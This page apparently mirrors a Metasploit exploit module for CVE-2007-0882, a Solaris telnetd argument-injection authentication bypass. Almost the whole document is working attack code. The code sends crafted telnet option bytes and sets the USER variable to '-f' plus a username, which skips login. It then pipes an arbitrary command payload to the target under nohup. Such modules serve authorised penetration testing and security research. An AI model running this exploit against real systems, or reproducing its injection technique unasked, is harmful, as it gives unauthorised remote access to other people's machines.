CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/solaris/telnet/fuser.rb
Views: 11623
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'Sun Solaris Telnet Remote Authentication Bypass Vulnerability',

14
      'Description'    => %q{

15
        This module exploits the argument injection vulnerability

16
        in the telnet daemon (in.telnetd) of Solaris 10 and 11.

17
      },

18
      'Author'         => [ 'MC' ],

19
      'License'        => MSF_LICENSE,

20
      'References'     =>

21
        [

22
          [ 'CVE', '2007-0882' ],

23
          [ 'OSVDB', '31881'],

24
          [ 'BID', '22512' ],

25
        ],

26
      'Privileged'     => false,

27
      'Platform'       => %w{ solaris unix },

28
      'Arch'           => ARCH_CMD,

29
      'Payload'        =>

30
        {

31
          'Space'    => 2000,

32
          'BadChars' => '',

33
          'DisableNops' => true,

34
          'Compat'      =>

35
            {

36
              'PayloadType' => 'cmd',

37
              'RequiredCmd' => 'generic perl telnet',

38
            }

39
        },

40
      'Targets'        =>

41
        [

42
          ['Automatic', { }],

43
        ],

44
      'DisclosureDate' => '2007-02-12',

45
      'DefaultTarget' => 0))

46


47
      register_options(

48
        [

49
          Opt::RPORT(23),

50
          OptString.new('USER', [ true, "The username to use",     "bin" ]),

51
        ])

52
  end

53


54
  def exploit

55
    connect

56


57
    print_status('Setting USER environment variable...')

58


59
    req =  "\xFF\xFD\x26\xFF\xFB\x26\xFF\xFD\x03\xFF\xFB"

60
    req << "\x18\xFF\xFB\x1F\xFF\xFB\x20\xFF\xFB\x21\xFF"

61
    req << "\xFB\x22\xFF\xFB\x27\xFF\xFD\x05"

62


63
    sock.put(req)

64
    sock.get_once

65


66
    req << "\xFF\xFC\x25"

67


68
    sock.put(req)

69
    sock.get_once

70


71
    req << "\xFF\xFA\x26\x01\x01\x02\xFF\xF0"

72


73
    sock.put(req)

74
    sock.get_once

75


76
    req << "\xFF\xFA\x1F\x00\x50\x00\x18\xFF\xF0"

77


78
    sock.put(req)

79
    sock.get_once

80


81
    req << "\xFF\xFE\x26\xFF\xFC\x23\xFF\xFC\x24"

82


83
    sock.put(req)

84
    sock.get_once

85


86
    req =  "\xFF\xFA\x18\x00\x58\x54\x45\x52\x4D\xFF"

87
    req << "\xF0\xFF\xFA\x27\x00\x00\x55\x53\x45\x52"

88
    req << "\x01\x2D\x66" + datastore['USER'] + "\xFF\xF0"

89


90
    sock.put(req)

91
    sock.get_once

92
    select(nil,nil,nil,0.25)

93


94
    sock.put("nohup " + payload.encoded + " >/dev/null 2>&1\n")

95


96
    select(nil,nil,nil,0.25)

97


98
    handler

99
  end

100
end

101


102